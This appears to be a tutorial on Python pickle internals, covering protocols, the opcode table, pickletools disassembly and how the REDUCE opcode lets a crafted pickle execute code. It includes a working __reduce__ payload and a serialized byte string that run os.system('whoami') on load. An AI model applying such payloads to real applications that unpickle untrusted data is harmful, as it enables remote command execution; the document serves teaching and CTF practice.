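Python deserialization is similar to PHP deserialization: serialization turns things that exist while a program runs (variables, dictionaries, object instances and so on) into a byte string that can be stored, and deserialization later restores them to the state they were saved in.
Python has two main pickling libraries, pickle and cPickle. Apart from speed they behave the same; in Python 3 cPickle no longer exists as a separate module, and pickle uses the C accelerator automatically.
Serialization: pickle.dumps() serializes an object to a bytes string; pickle.dump() serializes an object and writes the result to a file.
Deserialization: pickle.loads() rebuilds an object from a bytes string; pickle.load() reads the data from a file and rebuilds the object.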
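A minimal sketch of the four calls side by side. The sample dictionary is made up for illustration, and io.BytesIO stands in for a real file opened in binary mode.

```python
import io
import pickle

data = {"name": "tmx", "tags": ["a", "b", "c"], "age": 2021}

# dumps()/loads(): serialize to a bytes object and back.
blob = pickle.dumps(data)
restored = pickle.loads(blob)

# dump()/load(): the same round trip, but through a file-like object.
buffer = io.BytesIO()
pickle.dump(data, buffer)
buffer.seek(0)
restored_from_file = pickle.load(buffer)

print(type(blob).__name__)
print(restored == data, restored_from_file == data)
```

Note that the result of dumps() is bytes, not str, which is why files used with dump()/load() have to be opened in binary mode.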
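dumps() and dump() accept a protocol argument that selects the protocol version; loads() and load() take no such argument.
There are protocol versions 0, 1, 2, 3, 4 and 5, and the default differs between Python versions (for example 3 in Python 3.0 to 3.7 and 4 since Python 3.8). Protocol 0 is the most readable; later versions introduce non-printable bytes for efficiency.
The protocols are backward compatible: a newer Python can still read the older protocols, so a protocol 0 pickle can be used directly.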
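To see the difference between protocols, the following sketch pickles the same list with every protocol the running interpreter supports and checks whether the result is plain text. The helper is_text is a name introduced here for illustration only.

```python
import pickle

a_list = ["a", "b", "c"]

def is_text(blob):
    # True when every byte is printable ASCII or a newline.
    return all(32 <= byte < 127 or byte == 10 for byte in blob)

for proto in range(pickle.HIGHEST_PROTOCOL + 1):
    blob = pickle.dumps(a_list, protocol=proto)
    # loads() is not told which protocol was used; it works it out from the data.
    assert pickle.loads(blob) == a_list
    print(proto, is_text(blob), blob)

proto0_is_text = is_text(pickle.dumps(a_list, protocol=0))
proto2_is_text = is_text(pickle.dumps(a_list, protocol=2))
```

Only the protocol 0 output should come back as pure text, which is what makes it convenient for writing payloads by hand.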
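pickle is really a small stack language. It can be written in several ways; when writing a pickle by hand we usually use the protocol=0 form. When reading, Python automatically detects which form the incoming data uses.
Unlike conventional languages with variables and functions, a stack language like pickle has no notion of a variable name, which can make it a little hard to follow. pickle keeps its data in two places:
· stack: the working stack that opcodes push to and pop from
· memo: an indexed store (a dict keyed by integer in the pure-Python implementation) where values can be saved and fetched again later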
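The interplay of stack and memo is easiest to see in a tiny hand-written stream. The sketch below is an illustrative pickle written for this note, not output from dumps(); each opcode is explained in the comments.

```python
import pickle

# Hand-written protocol 0 style stream, one opcode per line:
#   (       MARK:    push a marker
#   Va\n    UNICODE: push 'a'
#   Vb\n    UNICODE: push 'b'
#   l       LIST:    pop back to the marker, push ['a', 'b']
#   p0\n    PUT:     store the stack top in memo slot 0
#   0       POP:     discard the stack top (the stack is now empty)
#   g0\n    GET:     push memo slot 0 back onto the stack
#   .       STOP:    return the stack top
stream = b"(Va\nVb\nlp0\n0g0\n."
result = pickle.loads(stream)
print(result)
```

Even though the list was popped off the stack, it survives in the memo and can be pushed back, which is the closest thing pickle has to a variable.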
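Commonly used pickle functions:
import pickle
a_list = ['a','b','c']
a_list_pickle = pickle.dumps(a_list,protocol=0)  # serialize the object to bytes
print(a_list_pickle)
print(pickle.loads(a_list_pickle))  # deserialize an object from bytes
# pickle.load(file) does the same, reading the data from a file opened in binary mode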
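Before hunting for deserialization vulnerabilities, we need to understand how Python deserialization proceeds.
Analysing a serialized byte string directly is fairly hard, so we can use pickletools to help.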
import pickle
import pickletools
a_list = ['a','b','c']
a_list_pickle = pickle.dumps(a_list,protocol=0)
print(a_list_pickle)
# optimize an already pickled byte string (drops unused PUT opcodes)
a_list_pickle = pickletools.optimize(a_list_pickle)
print(a_list_pickle)
# disassemble an already pickled byte string
pickletools.dis(a_list_pickle)
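As a small variation on the script above, the sketch below compares the pickle before and after optimize() and captures the disassembly as a string instead of printing it, using the out parameter of pickletools.dis. The variable names are chosen here for illustration.

```python
import io
import pickle
import pickletools

original = pickle.dumps(["a", "b", "c"], protocol=0)
optimized = pickletools.optimize(original)

# dis() writes to stdout by default; out= redirects it to any text stream.
listing = io.StringIO()
pickletools.dis(optimized, out=listing)
text = listing.getvalue()

print(len(original), len(optimized))
print(text)
```

The optimized pickle is shorter because the PUT opcodes that nothing ever reads back are removed, yet it still loads to the same list.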
The opcode set is as follows (pickletools.py documents each one in more detail):
MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding
TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py
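To connect the table to real data, pickletools.genops can walk a pickle one opcode at a time. The sketch below lists the opcodes of a protocol 3 pickle of the same three-element list; the names list is only there to make the result easy to inspect.

```python
import pickle
import pickletools

blob = pickle.dumps(["a", "b", "c"], protocol=3)

# genops() yields (opcode_info, argument, byte_offset) for each instruction.
names = []
for opcode, arg, pos in pickletools.genops(blob):
    names.append(opcode.name)
    print(f"{pos:3d}  {opcode.code!r:8} {opcode.name:12} {arg!r}")
```

Each opcode.code value printed here is one of the single-byte constants from the table above.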
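Compare the table with a real disassembly. The dump below carries a protocol 3 header (\x80\x03) and has no PUT opcodes, so it appears to come from an optimized protocol=3 pickle of the same list rather than from the protocol=0 call above: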
b'\x80\x03](X\x01\x00\x00\x00aX\x01\x00\x00\x00bX\x01\x00\x00\x00ce.'
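0: \x80 PROTO 3 # declares the protocol version
2: ] EMPTY_LIST # push an empty list
3: ( MARK # push a mark object
4: X BINUNICODE 'a' # push a unicode string
10: X BINUNICODE 'b'
16: X BINUNICODE 'c'
22: e APPENDS (MARK at 3) # append everything above the MARK at offset 3 to the list
# pop the result off the stack and finish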
23: . STOP
highest protocol among opcodes = 2
Another example, this time with a class instance:
import pickle
import pickletools
import base64
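class a_class():
    def __init__(self):
        self.age = 2021
        self.name = "tmx"
        self.list = ["donot","giveme","hope"]
a_class_new = a_class()
a_class_pickle = pickle.dumps(a_class_new,protocol=3)
print(a_class_pickle)
# optimize an already pickled byte string; the result is kept in its own variable,
# so the unoptimized pickle is what gets printed and disassembled below
a_class_optimized = pickletools.optimize(a_class_pickle)
print(a_class_pickle)
# disassemble an already pickled byte string
pickletools.dis(a_class_pickle)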
b'\x80\x03c__main__\na_class\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03M\xe5\x07X\x04\x00\x00\x00nameq\x04X\x03\x00\x00\x00tmxq\x05X\x04\x00\x00\x00listq\x06]q\x07(X\x05\x00\x00\x00donotq\x08X\x06\x00\x00\x00givemeq\tX\x04\x00\x00\x00hopeq\neub.'
b'\x80\x03c__main__\na_class\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03M\xe5\x07X\x04\x00\x00\x00nameq\x04X\x03\x00\x00\x00tmxq\x05X\x04\x00\x00\x00listq\x06]q\x07(X\x05\x00\x00\x00donotq\x08X\x06\x00\x00\x00givemeq\tX\x04\x00\x00\x00hopeq\neub.'
0: \x80 PROTO 3
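# GLOBAL: push self.find_class(modname, name); it reads two newline-terminated strings as its arguments
# here that is self.find_class('__main__', 'a_class')
# note that find_class is implemented differently in different Python versions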
2: c GLOBAL '__main__ a_class'
20: q BINPUT 0
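# push an empty tuple
22: ) EMPTY_TUPLE
# NEWOBJ expects a class on the stack (pushed by GLOBAL at offset 2) with a tuple above it (the EMPTY_TUPLE pushed at offset 22), and calls cls.__new__(cls, *args), i.e. it creates an instance from the items of the tuple; the tuple is empty here
23: \x81 NEWOBJ
24: q BINPUT 1
# push a new empty dict
26: } EMPTY_DICT
27: q BINPUT 2
# a mark
29: ( MARK
# push a unicode string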
30: X BINUNICODE 'age'
38: q BINPUT 3
40: M BININT2 2021
43: X BINUNICODE 'name'
52: q BINPUT 4
54: X BINUNICODE 'tmx'
62: q BINPUT 5
64: X BINUNICODE 'list'
73: q BINPUT 6
75: ] EMPTY_LIST
76: q BINPUT 7
# double mark
78: ( MARK
79: X BINUNICODE 'donot'
89: q BINPUT 8
91: X BINUNICODE 'giveme'
102: q BINPUT 9
104: X BINUNICODE 'hope'
113: q BINPUT 10
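# append the values above the mark at offset 78 to the list pushed at offset 75
115: e APPENDS (MARK at 78)
# SETITEMS adds any number of key/value pairs to an existing dict
# Stack before: ... pydict markobject key_1 value_1 ... key_n value_n
# Stack after: ... pydict
116: u SETITEMS (MARK at 29)
# BUILD finishes constructing the object (the one created at offset 23) via __setstate__ or by updating __dict__
# if the object has a __setstate__ method, anyobject.__setstate__(argument) is called
# otherwise the values are applied with anyobject.__dict__.update(argument)
# note that this can overwrite existing attributes
117: b BUILD
# pop the result off the stack and finish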
118: . STOP
highest protocol among opcodes = 2
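The NEWOBJ / SETITEMS / BUILD sequence above can be reproduced by hand. In the sketch below, types.SimpleNamespace is only a stand-in for a_class (an assumption made so the stream loads from any module), and the stream itself was written for this note rather than produced by dumps().

```python
import pickle

stream = (
    b"ctypes\nSimpleNamespace\n"  # GLOBAL: push the class types.SimpleNamespace
    b")"                          # EMPTY_TUPLE: the (empty) argument tuple
    b"\x81"                       # NEWOBJ: cls.__new__(cls); __init__ is not run
    b"}"                          # EMPTY_DICT: the state dict
    b"("                          # MARK
    b"Vage\nI2021\n"              # key 'age', value 2021
    b"Vname\nVtmx\n"              # key 'name', value 'tmx'
    b"u"                          # SETITEMS: put the pairs into the dict
    b"b"                          # BUILD: no __setstate__ here, so the dict
                                  #        is merged into obj.__dict__
    b"."                          # STOP
)
obj = pickle.loads(stream)
print(obj.age, obj.name)
```

Because BUILD writes straight into __dict__, whoever controls the stream controls every attribute of the rebuilt object, which is the overwrite risk mentioned in the comments above.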
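pickle deserialization challenges in CTFs are mostly exploited through __reduce__.
__reduce__ runs when an object is pickled; the (callable, args) pair it returns is written into the stream, and the opcode that later calls it is R (REDUCE).
# pickletools.py, around line 1955 (the exact line depends on the Python version)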
name='REDUCE',
code='R',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[anyobject],
proto=0,
doc="""Push an object built from a callable and an argument tuple.
The opcode is named to remind of the __reduce__() method.
Stack before: ... callable pytuple
Stack after: ... callable(*pytuple)
The callable and the argument tuple are the first two items returned
by a __reduce__ method. Applying the callable to the argtuple is
supposed to reproduce the original object, or at least get it started.
If the __reduce__ method returns a 3-tuple, the last component is an
argument to be passed to the object's __setstate__, and then the REDUCE
opcode is followed by code to create setstate's argument, and then a
BUILD opcode to apply __setstate__ to that argument.
If not isinstance(callable, type), REDUCE complains unless the
callable has been registered with the copyreg module's
safe_constructors dict, or the callable has a magic
'__safe_for_unpickling__' attribute with a true value. I'm not sure
why it does this, but I've sure seen this complaint often enough when
I didn't want to <wink>.
"""
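Whenever the serialized byte string contains an R opcode, the unpickler calls the callable on the stack with the argument tuple, exactly as if a __reduce__ method had returned them, whether or not the program doing the loading defines __reduce__ anywhere.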
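A harmless way to watch the R opcode at work is a hand-written stream that calls builtins.len instead of a shell command. This is an illustrative sketch written for this note; no class and no __reduce__ method is involved at all.

```python
import pickle

stream = (
    b"cbuiltins\nlen\n"  # GLOBAL: push builtins.len
    b"("                 # MARK
    b"Vabc\n"            # UNICODE: push 'abc'
    b"t"                 # TUPLE: pop back to the marker, push ('abc',)
    b"R"                 # REDUCE: call len('abc') and push the result
    b"."                 # STOP
)
result = pickle.loads(stream)
print(result)
```

Swapping the callable and the argument tuple is all it takes to turn this into a command-execution payload, which is why untrusted data should never be passed to pickle.loads().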
import pickle
import pickletools
import base64
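class a_class():
    def __init__(self):
        self.age = 2021
        self.name = "tmx"
        self.list = ["donot","giveme","hope"]
    def __reduce__(self):
        # on unpickling this becomes a call to os.system("whoami")
        return (__import__('os').system, ("whoami",))
a_class_new = a_class()
a_class_pickle = pickle.dumps(a_class_new,protocol=3)
print(a_class_pickle)
# optimize an already pickled byte string; the result is kept in its own variable,
# so the unoptimized pickle is what gets printed and disassembled below
a_class_optimized = pickletools.optimize(a_class_pickle)
print(a_class_pickle)
# disassemble an already pickled byte string
pickletools.dis(a_class_pickle)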
'''
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
0: \x80 PROTO 3
2: c GLOBAL 'nt system'
13: q BINPUT 0
15: X BINUNICODE 'whoami'
26: q BINPUT 1
28: \x85 TUPLE1
29: q BINPUT 2
31: R REDUCE
32: q BINPUT 3
34: . STOP
highest protocol among opcodes = 2
'''
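Take the generated payload into a normal program that has no __reduce__ and the command is still executed. The payload above was generated on Windows, where os.system lives in the nt module, so it only loads there; generated on Linux, the module name would be posix.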
import pickle
import pickletools
import base64
class a_class():
    def __init__(self):
        self.age = 2021
        self.name = "tmx"
        self.list = ["donot","giveme","hope"]
# loading the payload runs os.system("whoami") even though a_class has no __reduce__
a_class_pickle = pickle.loads(b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.')
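The same experiment can be repeated safely by letting __reduce__ return a harmless callable. In this sketch the class name Demo and the use of len are stand-ins chosen for illustration; the point is that the payload does not mention the class at all, so the loading side needs neither the class nor its __reduce__.

```python
import pickle

class Demo:
    def __reduce__(self):
        # Harmless stand-in for os.system("whoami"): call len("whoami").
        return (len, ("whoami",))

payload = pickle.dumps(Demo(), protocol=3)
result = pickle.loads(payload)

print(payload)
print(b"Demo" in payload, result)
```

loads() returns whatever the callable returned, here the length of the string, instead of a Demo instance.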
That's it, I'm slacking off now.